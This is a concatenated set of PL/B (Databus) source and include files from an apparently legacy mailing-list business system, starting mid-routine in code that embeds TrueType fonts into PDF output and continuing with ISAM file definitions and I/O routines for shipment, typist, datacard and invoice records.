swap2 nameEnt(cntr).length
swap2 nameEnt(cntr).offset
// ansi name
IF (nameEnt(cntr).platform = 1 && nameEnt(cntr).encoding = 0 && nameEnt(cntr).nameID=6 )
CALC noffset = table(cntr1).offset + nametbl.strOff + nameEnt(cntr).offset
MOVE nameEnt(cntr).length,nlen
ENDIF
// ansi attributes
IF (nameEnt(cntr).platform = 1 && nameEnt(cntr).encoding = 0 && nameEnt(cntr).nameID=2 )
CALC aoffset = table(cntr1).offset + nametbl.strOff + nameEnt(cntr).offset
MOVE nameEnt(cntr).length,alen
ENDIF
// not doing unicode...for now
REPEAT
REPOSIT FontFile,noffset
READ FontFile,seq;*ABSON,fontattr.name;
SETLPTR fontattr.name,nlen
SQUEEZE fontattr.name,fontattr.name //remove spaces from name
.
REPOSIT FontFile,aoffset
READ FontFile,seq;*ABSON,scratch;
SETLPTR scratch,alen
WHEREIS "Bold",scratch
IF NOT ZERO
ADD "262144",fontattr.Flags // bit 19
ENDIF
WHEREIS "Italic",scratch
IF NOT ZERO
ADD "64",fontattr.Flags // bit 7
ENDIF
ADD "4",fontattr.Flags // bit 3 - symbolic ( 8bit )
//
// can we embed this font?
//
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="OS/2")
REPEAT
REPOSIT FontFile,table(cntr).offset
READ FontFile,seq;*abson,int2; // table version
.
IF (int2=0) // http://developer.apple.com/fonts/ttrefman/rm06/Chap6OS2.html
REPOSIT FontFile,(table(cntr).offset + 7 ) //fsType
ELSE //http://www.microsoft.com/typography/otspec/os2.htm#ver
REPOSIT FontFile,(table(cntr).offset + 8 ) //fsType
ENDIF
.
CLEAR FontAttr.EmbedOK
READ FontFile,seq;*abson,int2;
swap2 int2
IF ( int2 ) // has restrictions
AND 268,int2 //( 0x100 | 0x008 | 0x004 ) embedding allowed
IF ( int2 )
SET FontAttr.EmbedOK
ENDIF
ELSE // no restrictions
SET FontAttr.EmbedOK
ENDIF
.
UPPERCASE FontAttr.Filename
SEARCH FontAttr.Filename,winfonts(1),winfontscount,int2a
IF (int2a)
CLEAR FontAttr.EmbedOK
ENDIF
..
.. this would be needed to embed font subsets
..
. FOR cntr,1,Header.tablecnt
. BREAK IF (table(cntr).tag="loca") // glyph offset table first
. REPEAT
. REPOSIT FontFile,table(cntr).offset
....
. FOR cntr,1,Header.tablecnt
. BREAK IF (table(cntr).tag="glyf") // glyphs table
. REPEAT
. IF (Head.loc_fmt=0)
. REPOSIT FontFile,( table(cntr).offset + (GlyphOffset(char)*2) + 2 )
. ELSE
. REPOSIT FontFile,( table(cntr).offset + GlyphOffset(char) + 2 )
. ENDIF
.
. WRITE the font data to the PDF
.
CLOSE FontFile
GETFILE pdfFontCache
IF NOT EQUAL
PREP pdfFontCache,"pdfFontCache","pdfFontCache","1-20","1958"
ENDIF
.
PACKKEY dim260,fontattr.Filename
.
FINDFILE fontattr.Filename,NAME=fontattr.hash
. HASH dim260,hash
. ENCODE64 hash,fontattr.hash
.
WRITE pdfFontCache;fontattr,cmap.glypharray
CLOSE pdfFontCache
.
FromCache
.
INCR NumOfTTFonts
CHOP fontattr.Filename,TTFonts(NumOfTTFonts).File
.
CALL WriteBaseFont using NumOfTTFonts,TTFonts(NumOfTTFonts).Descriptor,fsize,attrib
.
//
// font descriptor
MOVE ObjNum,TTFonts(NumOfTTFonts).Descriptor
.
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;"<<"
WRITE pdffile,seq;" /Type /FontDescriptor"
WRITE pdffile,seq;" /FontName /",*ll,fontattr.Name
WRITE pdffile,seq;" /ItalicAngle 0"
WRITE pdffile,seq;" /MissingWidth ",fontattr.MissingW
WRITE pdffile,seq;" /Flags ",fontattr.Flags
.
WRITE pdffile,seq;" /StemV ",fontattr.Stemv
WRITE pdffile,seq;" /Ascent ",fontattr.Ascent
WRITE pdffile,seq;" /Descent ",fontattr.Descent
WRITE pdffile,seq;" /FontBBox [",fontattr.bbox,"]"
.
IF (fontattr.embedOK)
INCR ObjNum // xref for font descriptor
SQUEEZE ObjNum,scratch
WRITE pdffile,seq;" /FontFile2 ",*ll,scratch," 0 R"
ENDIF
WRITE pdffile,seq;">>"
WRITE pdffile,seq;"endobj"
IF (fontattr.embedOK)
// font file
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
.
. may have come from cache to open, then read
.
FINDFILE Fontattr.Filename,filesize=fm10
DMAKE streamdat,fm10
OPEN FontFile,fontattr.Filename,READ
READ FontFile,seq;*abson,streamdat;
CLOSE FontFile
.
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;"<<"
WRITE pdffile,seq;" /Length ",fm10
WRITE pdffile,seq;" /Length1 ",fm10
WRITE pdffile,seq;">>"
WRITE pdffile,seq;"stream"
WRITE pdffile,seq;*ll,streamdat
WRITE pdffile,seq;"endstream"
WRITE pdffile,seq;"endobj"
ENDIF
.
LoadLocal
.
. load our internal font structure
.
MOVE fontattr.Descent,FontMetrics.Descender
MOVE "50",FontMetrics.ulpen
MOVE fontattr.Descent,FontMetrics.ulPos
CLEAR FontMetrics.GlyphWidths
FOR cntr,32,254
MOVE fontattr.Widths(cmap.glypharray(cntr)),FontMetrics.GlyphWidths(cntr)
REPEAT
MOVE fsize,fontsize
.
ENDSET page(curpage).fontres
APPEND CurFontRes,page(curpage).fontres
.
SET usingttf
SETFLAG NOT OVER
FUNCTIONEND
WriteBaseFont LFUNCTION
TTFNum form 2
descriptor form ^
fsize form 3
attrib dim ^
ENTRY
cntr integer 1
INCR ObjNum // xref for font object
SQUEEZE objNum,scratch
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
.
MOVE ObjNum,TTFonts(TTFNum).Res(AttrIdx)
.
PACK CurFontRes,"/TF",scratch," ",scratch," 0 R"
.
PACK CurrentFont,"/TF",scratch," ",fsize," Tf"
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;"<<"
WRITE pdffile,seq;" /Type /Font"
WRITE pdffile,seq;" /Subtype /TrueType"
WRITE pdffile,seq;" /FirstChar ",fontattr.FirstChar
WRITE pdffile,seq;" /LastChar ",fontattr.LastChar
Write pdffile,seq;" /Encoding /WinAnsiEncoding"
WRITE pdffile,seq;" /BaseFont /",*ll,fontattr.Name;
MOVEPTR attrib,attrib
IF NOT OVER
IF (attrib != "")
WRITE pdffile,seq;",",attrib
ELSE
WRITE pdffile,seq;
ENDIF
ELSE
WRITE pdffile,seq;
ENDIF
WRITE pdffile,seq;" /Widths [";
FOR cntr,32,254
WRITE pdffile,seq;fontattr.Widths(cmap.glyphArray(cntr));
REPEAT
WRITE pdffile,seq;"]"
IF (descriptor = 0)
INCR ObjNum
MOVE ObjNum,descriptor
ENDIF
SQUEEZE descriptor,scratch
WRITE pdffile,seq;" /FontDescriptor ",*ll,scratch," 0 R"
WRITE pdffile,seq;">>"
WRITE pdffile,seq;"endobj"
FUNCTIONEND
ReadTTFCache LFUNCTION
filename dim ^
ENTRY
OPEN pdfFontCache,"pdfFontCache.isi"
FINDFILE filename,name=hashkey
. PACKKEY dim260,filename
. HASH dim260,hash
. ENCODE64 hash,hashkey
READ pdfFontCache,hashkey;*ll,fontattr,cmap.glypharray
FUNCTIONEND
<file_sep>/include/nshp2dd.inc
..............................................................................
.
. NSHP2DD INCLUSION
. NIN SUPPLEMENTAL SHIPMENT FILE DEFINITION
.
. FILE NAME : NINSHP2
. REC LENGTH: 1006 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
.05/1/2003 ASH Created
..............................................................................
.
NSHP2FILE IFILE KEYLEN=6
.NSHPFILE IFILE KEYLEN=6,FIXED=1006
NSHP2NAME INIT "NINSHP2 "
NSHP2FLD DIM 6
NSHP2FLAG FORM 1
nshp2lock form 1 0 OR 1=filepi,2=recordlock, 3=no lock.
.
shp2vars list
SLRNUM2 DIM 6 001-006 LR NUMBER
SNOTES2 DIM 500 007-506 INTERNAL SHIPPING NOTES
SNOTES2B DIM 500 507-1006 EXTERNAL SHIPPING NOTES
listend
.
..............................................................................
<file_sep>/include/NTYPIO.INC
* NTYPIO/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER TYPIST ANALISYS FILE.
* *****************************************************************************
.
. FILE: TYPOUT
. LENGTH: 59
.COMPRESS: NONE
. TYPE: ISAM
. KEY: IDNUM,TYPE
...............................................................................
.
. ENTRY POINT : NTYPKEY
. REQUIRED : 'NTYPFLD'
. RETURNED : TYPIST DATA RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NTYPKEY
BRANCH NTYPFLAG TO NTYP1
BRANCH NTYPFLAG TO NTYP1
CALL NTYPOPEN
NTYP1 FILEPI 1;NTYPFILE
READ NTYPFILE,NTYPFLD;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPTST
. REQUIRED : NTYPFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NTYPTST BRANCH NTYPFLAG TO NTYP2
CALL NTYPOPEN
NTYP2 FILEPI 1;NTYPFILE
READ NTYPFILE,NTYPFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NTYPKS
. REQUIRED :
. RETURNED : TYPIST DATE RECORD
. DESCRIPTION : KEY SEQUENTIAL TYPIST FILE READ
.
NTYPKS
BRANCH NTYPFLAG TO NTYP3
CALL NTYPOPEN
NTYP3 FILEPI 1;NTYPFILE
READKS NTYPFILE;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPWRT
. REQUIRED : 'NTYPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NTYPWRT
BRANCH NTYPFLAG TO NTYP5
CALL NTYPOPEN
NTYP5 FILEPI 1;NTYPFILE
WRITE NTYPFILE,NTYPFLD;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE TYPIST FILE
.
NTYPUPD
BRANCH NTYPFLAG TO NTYP6
CALL NTYPOPEN
NTYP6 FILEPI 1;NTYPFILE
UPDATE NTYPFILE;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPDEL
. REQUIRED : 'NTYPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NTYPDEL BRANCH NTYPFLAG TO NTYP7
CALL NTYPOPEN
NTYP7 FILEPI 1;NTYPFILE
DELETE NTYPFILE,NTYPFLD
RETURN
...............................................................................
.
. ENTRY POINT : NTYPOPEN
. REQUIRED : 'NTYPFLAG'
. RETURNED : 'NTYPFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MAILER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NTYPOPEN TRAP NTYPGONE IF IO
OPEN NTYPFILE,NTYPNAME
TRAPCLR IO
MOVE C1 TO NTYPFLAG
RETURN
.
NTYPGONE MOVE NTYPNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NMDCMSCIO.inc
..............................................................................
.******************************************************
.* MISC List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* NMSC DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing NMSC, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : NMSCKEY
. REQUIRED : 'NMSCFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NMSCKEY BRANCH NMSCFlag TO NMSC1
CALL NMSCOpen
NMSC1 FILEPI 1;NMSCFile
READ NMSCFile,NMSCFld;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCTST
. REQUIRED : NMSCFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
NMSCTST BRANCH NMSCFlag TO NMSC2
CALL NMSCOpen
NMSC2 FILEPI 1;NMSCFile
READ NMSCFile,NMSCFld;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NMSCKS
. REQUIRED :
. RETURNED : NMSC Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
NMSCKS BRANCH NMSCFlag TO NMSC3
CALL NMSCOpen
NMSC3 FILEPI 1;NMSCFile
READKS NMSCFile;NMSCVars
RETURN
..............................................................................
. ENTRY POINT : NMSCSEQ
. REQUIRED :
. RETURNED : NMSC Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
NMSCSEQ BRANCH NMSCFlag TO NMSC4
CALL NMSCOpen
NMSC4 FILEPI 1;NMSCFile
READ NMSCFile,SEQ;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCWRT
. REQUIRED : 'NMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NMSCWRT BRANCH NMSCFlag TO NMSC5
CALL NMSCOpen
NMSC5 FILEPI 1;NMSCFile
WRITE NMSCFile,NMSCFld;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
NMSCUPD BRANCH NMSCFlag TO NMSC6
CALL NMSCOpen
NMSC6
FILEPI 1;NMSCFile
UPDATE NMSCFile;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCDEL
. REQUIRED : 'NMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NMSCDEL BRANCH NMSCFlag TO NMSC7
CALL NMSCOpen
NMSC7 FILEPI 1;NMSCFile
DELETE NMSCFile,NMSCFld
RETURN
..............................................................................
.
. ENTRY POINT : NMSCOpen
. REQUIRED : 'NMSCFlag' 'NMSCPATH'
. RETURNED : 'NMSCFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NMSCOpen TRAP NMSCGONE giving error IF IO
OPEN NMSCFile,NMSCName
TRAPCLR IO
MOVE C1 TO NMSCFlag
RETURN
..............................................................................
NMSCGONE MOVE NMSCNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/M2NIO.inc
..............................................................................
.******************************************************
.* M2N List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* M2N DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam fixed
...................
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing M2N, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : M2NKEY
. REQUIRED : 'M2NFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
M2NKEY Branch M2nPath,M2n1a,M2n1c
M2n1a BRANCH M2NFlag TO M2N1B
CALL M2NOpen
M2N1B FILEPI 1;M2NFile
READ M2NFile,M2NFld;M2NVars
RETURN
M2n1C BRANCH M2NFlag TO M2N1D
CALL M2NOpen
M2N1D FILEPI 1;M2NFile2
READ M2NFile2,M2NFld2;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NTST
. REQUIRED : M2NFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
M2NTST Branch M2nPath,M2n2a,M2N2C
M2n2a BRANCH M2NFlag TO M2N2B
CALL M2NOpen
M2N2B FILEPI 1;M2NFile
READ M2NFile,M2NFld;STR1
RETURN
M2n2c BRANCH M2NFlag TO M2N2D
CALL M2NOpen
M2N2d FILEPI 1;M2NFile2
READ M2NFile2,M2NFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : M2NKS
. REQUIRED :
. RETURNED : M2N Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
M2NKS Branch M2NPath,M2N3a,M2N3C
M2N3A BRANCH M2NFlag TO M2N3B
CALL M2NOpen
M2N3B FILEPI 1;M2NFile
READKS M2NFile;M2NVars
RETURN
M2N3C BRANCH M2NFlag TO M2N3D
CALL M2NOpen
M2N3D FILEPI 1;M2NFile2
READKS M2NFile2;M2NVars
RETURN
..............................................................................
. ENTRY POINT : M2NSEQ
. REQUIRED :
. RETURNED : M2N Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
M2NSEQ BRANCH M2NFlag TO M2N4
CALL M2NOpen
M2N4 FILEPI 1;M2NFile
READ M2NFile,SEQ;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NWRT
. REQUIRED : 'M2NFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
M2NWRT BRANCH M2NFlag TO M2N5
CALL M2NOpen
M2N5 FILEPI 1;M2NFlist
WRITE M2NFlist;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
M2NUPD BRANCH M2NFlag TO M2N6
CALL M2NOpen
M2N6
FILEPI 1;M2NFlist
UPDATE M2NFlist;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NDEL
. REQUIRED : 'M2NFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
M2NDEL BRANCH M2NFlag TO M2N7
CALL M2NOpen
M2N7 FILEPI 1;M2NFlist
DELETE M2NFList
RETURN
..............................................................................
.
. ENTRY POINT : M2NOpen
. REQUIRED : 'M2NFlag' 'M2NPATH'
. RETURNED : 'M2NFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
M2NOpen TRAP M2NGONE giving error IF IO
OPEN M2NFList
TRAPCLR IO
MOVE C1 TO M2NFlag
RETURN
..............................................................................
M2NGONE MOVE M2NNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/stabbdd.inc
; Last change: AH 19 Aug 1998 11:25 am
..............................................................................
.
. STABBDD INCLUSION
. STATE ABBREVIATION FILE DEFINITION
.
. FILE NAME : STABBREV
. REC LENGTH: 20 FIXED. INDEX KEY : 1-2 (2 POSITION STATE ABBREVIATION)
.
.
..............................................................................
.
NSTFILE IFILE KEYLEN=2,FIXED=20,UNCOMP
NSTNAME INIT "STABBREV"
.NSTFLE2 AFILE
.NSTFLE3 FILE FIXED=20
NSTFLD DIM 2
.NSTFLD2 DIM 48
.NSTFLAG FORM 1
.NSTFLG2 FORM 1
.NSTFLG3 FORM 1
.NSTPATH FORM 1
.NSTLOCK FORM 1 0 or 1=File Locks, 3=Record Locks, 3=No Locks
.
...............................................................................
*
stvars list
STABB DIM 2 1-2 STATE ABBREVIATION. **KEY**
STNAME DIM 18 3-20 STATE NAME
listend
.
LISTOFF
.PROGRAM ACCESS.
.F:\LIBRARY\PLB_SRC
.NAME TYPE ACCESS
.F:\LIBRARY\DEVELOP
.NAME TYPE ACCESS
.F:\APPS\PLB\CODE
.NAME TYPE ACCESS
LISTON
<file_sep>/DEVELOP/Includes - why/NSPIDD.INC
..............................................................................
.
. NSPIDD INCLUSION
. NIN SPECIAL INSTRUCTION FILE DEFINITION
.
. FILE NAME : NINSPI
. REC LENGTH: 97 FIXED
. INDEX KEY : 1-3
.patch 1.0 change key field to 3 oct 10 2006
..............................................................................
.
NSPIFILE IFILE KEYLEN=2,FIXED=96,UNCOMP
.NSPIFILE IFILE KEYLEN=2,FIXED=96,UNCOMP
NSPINAME INIT "NINSPI.isi|NINS1:502 "
NSPIFLD DIM 3
.NSPIFLD DIM 2
NSPIFLAG FORM 1
.
SPINO dim 3 1-3 SPECIAL INTRUCTION NUMBER
.SPINO dim 2 1-2 SPECIAL INTRUCTION NUMBER
INST1 DIM 47 3-49 SPECIAL INSTRUCTION LINE #1
INST2 DIM 47 50-96 SPECIAL INSTRUCTION LINE #2
.
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.CLEARPRT DATABUS
.DIVSPOOL DATABUS
.EPSSPOOL DATABUS
.FIXLCR DATABUS
.FIXORD DATABUS
.NINCLEAR DATABUS
.NINMAC DATABUS
.NINP11D DATABUS
.PAYORDERPRT DATABUS
.SPIMOD DATABUS
.SPOOLLCRS DATABUS
.TDMCSPOL DATABUS
.WARSPOOL DATABUS
LISTON
<file_sep>/include/MDCMSCDD.INC
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MSC
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDCMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
MMSCNAME Init "MDC_MSC.Isi|NINS1:502"
MMSCFILE IFILE Name="MDC_MSC.Isi|NINS1:502"
MMSCSFILE FILE
.MMSCSFILE FILE Name="MDC_MSC.csv"
MMscFld Dim 6
MMSCFLAG FORM 1
MMSCPATH FORM 1
.
MMSCVARS LIST .for ease I am using Min's names
DDCNO Dim 6 1-6 Card#
DAD1 Dim 30 7-36 Addressing 1
DAD2 Dim 30 37-66 Addressing 2
DMO1 Dim 25 67-91 Min order line 1
DMO2 Dim 25 92-116 Min order line 2
DUS1 Dim 25 117-141 UNit of Sale line 1
DUS2 Dim 25 142-166 UNit of Sale line 2
DSX1 Dim 25 167-191 Gender Line 1
DSX2 Dim 25 192-216 Gender Line 2
DMD1 Dim 25 217-241 Media Line 1
DMD2 Dim 25 242-266 Media Line 2
DRS1 Dim 25 267-291 Net Name Line 1
DRS2 Dim 25 292-316 Net Name Line 2
DDLT Dim 1 317-317 'A'ctive/'I'nactive
ListEnd
<file_sep>/include/NCMPXOWNDd.inc
******************************************************************************
*VARIABLE INCLUSION FOR Company to Owner XREF FILE.
******************************************************************************
* FILE: CompXOwn
* RECORD SIZE:
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 Company NUMBER 1-6 - DUPLICATES ALLOWED
* KEY: 2 Owner NUMBER 7-10
******************************************************************************
.
NCXOFLst Filelist
NCXOFILE IFILE KEYLEN=6,FIX=35,DUP,Name="CompXOwn.ISI|NINS1:502"
NCXOFIL2 IFILE KEYLEN=4,FIX=35,Name="CompXOwn1.ISI|NINS1:502"
Filelistend
.
NCXOFLAG FORM 1
NCXOFLG2 FORM 1
NCXOPATH FORM 1
NCXONAME DIM 12
NCXONAM1 INIT "CompXOwn "
NCXONAM2 INIT "CompXOwn1 "
.
NCXOFLD DIM 6
NCXOFLD2 DIM 4
.
NCXOVARS LIST
NCXOComp DIM 6 1-6 Company NUMBER KEY
NCXOOwn DIM 4 7-10 Old Owner NUMBER
NCXOFill DIM 25 11-35
ListEnd
..............................................................................
<file_sep>/DEVELOP/Includes - why/ninvdd.inc
.. ninvdd.inc
.. ............................................................................
.. NAMES IN THE NEWS INCLUDE LIBRARY
.. ............................................................................
..
.. FILE: NININV
.. LENGTH: 300
.. COMPRESS: NONE
.. TYPE: ISAM, aim
.. isi KEY: 12-17 nininv.isi LR Keyl = 6
.. 124-129 Nininv.isi INVOICE NUMBERS,KEYL=6.
.sunidxnt \\nts1\e\data\text\nininv.dat,\\nts1\e\data\index\nininvdev,l300,c:\ -n,e,12-17
.sunidxnt \\nts1\e\data\text\nininv.dat,\\nts1\e\data\index\nininvdev2,l300,c:\ -n,e,124-129
.Print File:
.sunidxnt \\nts1\e\data\ninvoice.dat,\\nts1\e\data\index\ninvoice,l303,c:\ -12-17
..aim keys:
.sunadxnt \\NTS1\E\DATA\TEXT\NININV.DAT \\NTS1\E\DATA\INDEX\NININV.AAM L300 -u,209-214,223-228,237-242,20-31,274-288
.
. CHKN1 DIM 6 209-214 1ST CHECK NUMBER, AFTER CHECK RELEASED
. CHKN2 DIM 6 223-228 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
. CHKN3 DIM 6 237-242 3rd CHECK NUMBER, should be escrow IE TDMC
. LOINVN DIM 12 20-31 LIST OWNER INVOICE NUMBER aim key nininv4
. IMLRCHK DIM 15 274-288 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
.*******************************************************************************
. patch 10.02 PLI
.Ninv0001 - Patch 10.00 Total rewrite and new file structure
.*patch 2.2 29Jan2004 DLH Broker Guar letter
.NINV0001 Patch 10.0 DLH June 2003
. includes change to filelist and combining of the two aimdex files.
.and increase in size of Mailer's check number from 6 to 15
.*patch 2.1 MANAGE October 2001
.*Patch 2.0 y2k etc March 1999
.*10oct94 DLH prep for nets run charge & percentage new len 302.
.*05OCT94 DLH ADD SPLIT EXCHANGE QTY & ppm new length 294
.*23feb94 DLH increase list owner invoice 6 to 12 add running charge var.
.*23APR93 DLH PREP FOR BROKER/CONSULTANT FIELDS AND MAILER CHECK NUMBER FIELD
. NEW LENGTH WILL BE : 269.
.*;ADDITIONAL NOTES: aim keys added 10/5/92
.*******************************************************************************
.
...............................................................................
.INCOME OR
.PAYCODE " "= 1 A/P A/R LR, 'STANDARD BILLING'
. "1"= NOT USED
. "2"= 2 A/P'S
. "3"= KEYIN A/P1
. "4"= GROSS A/R = LRINC.
.
...............................................................................
.ADDITIONAL CHARGE SUB-FIELDS ARE DEFINED AS FOLLOWS:
.
.BYTES DESCRIPTION.
.begin patch 2.0
..................................................................................
.add chrg key expanded to 3 see below.
. . 1-2 ADD. CHG. CODE USED TO ACCESS NINACD/TEXT.
. . 3-9 AMOUNT IF FLAT FEE, OR RATE PER M. BASED ON ADD. CHG. CODE.
. . 10-10 NOT USED
. . 11-13 PERCENTAGE OF ADD. CHG. TO LR INCOME, REMAINDER TO A/P.
. . 14-14 '1'= DON'T PRINT CHARGE ON INVOICE ie: RUNNING CHARGES
..................................................................................
. 1-3 ADD. CHG. CODE USED TO ACCESS NINACD/TEXT.
. 4-10 AMOUNT IF FLAT FEE, OR RATE PER M. BASED ON ADD. CHG. CODE.
. 11-11 NOT USED
. 12-14 PERCENTAGE OF ADD. CHG. TO LR INCOME, REMAINDER TO A/P.
. 15-15 '1'= DON'T PRINT CHARGE ON INVOICE ie: RUNNING CHARGES
.end patch 2.0
. ADD TO A/R AND A/P1 *
. ' '= STRAIGHT BILLING
. INTO A/R AND A/P1 *
. UNLESS 2 A/P'S THEN TO A/R & A/P2.
. OR INCOME/PAYCODE = '3' THEN TO A/R & LR.
. '2'= INTO A/R AND A/P1 *
.
. * ALSO PERCENTAGE MAY BE COMBINED WITH CODES 1 & 2 TO SPLIT BETWEEN
. LRINC & A/P.
...............................................................................
.
.begin patch 2.0
.begin patch 10.0
PINVFILE IFILE KEYLEN=6,FIX=303 .Print file Duplicates master + 3 bytes typist info
.PINVFILE IFILE KEYLEN=6,FIX=412 .Print file Duplicates master + 3 bytes typist info
PINVNAME INIT "NINVOICE.ISI|NINS1:502"
.PINVNAME INIT "NINVOICE.ISI|20.20.30.103:502"
PINVFlag Form 1
.
NInvFLst Filelist
.NINVFILE IFILE KEYLEN=6,FIXED=302
.NINVFIL2 IFILE KEYLEN=6,FIXED=302,NODUPLICATES
.NINVFIL3 AFILE FIXED=302 .plb
.NINVFIL4 AFILE FIXED=302 .plb
.NINVFILE IFILE KEYLEN=6,FIXED=400,"NININV.ISI|20.20.30.103:502 "
.NINVFIL2 IFILE KEYLEN=6,FIXED=400,NODUPLICATES,"NININV2.ISI|20.20.30.103:502 "
.NINVFIL3 AFILE FIXED=400,"NININV.AAM|20.20.30.103:502 "
NINVFILE IFILE KEYLEN=6,FIXED=300,Name="NININV.ISI|NINS1:502 "
NINVFIL2 IFILE KEYLEN=6,FIXED=300,NODUPLICATES,Name="NININV2.ISI|NINS1:502 "
NINVFIL3 AFILE FIXED=300,Name="NININV.AAM|NINS1:502 "
.;;.sunadxnt -330-335,344-349,358-363,15-26,395-409
.;; CHKN1 DIM 6 330-335 1ST CHECK NUMBER, AFTER CHECK RELEASED
.;; CHKN2 DIM 6 344-349 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
.;; CHKN3 DIM 6 358-363 3rd CHECK NUMBER, should be escrow IE TDMC
.;; LOINVN DIM 12 15-26 LIST OWNER INVOICE NUMBER aim key nininv4
.;; IMLRCHK DIM 6 395-400 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
..sunadxnt L285 -u,190-195,204-209,218-223,17-28,255-259
. CHKN1 DIM 6 190-195 1ST CHECK NUMBER, AFTER CHECK RELEASED
. CHKN2 DIM 6 204-209 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
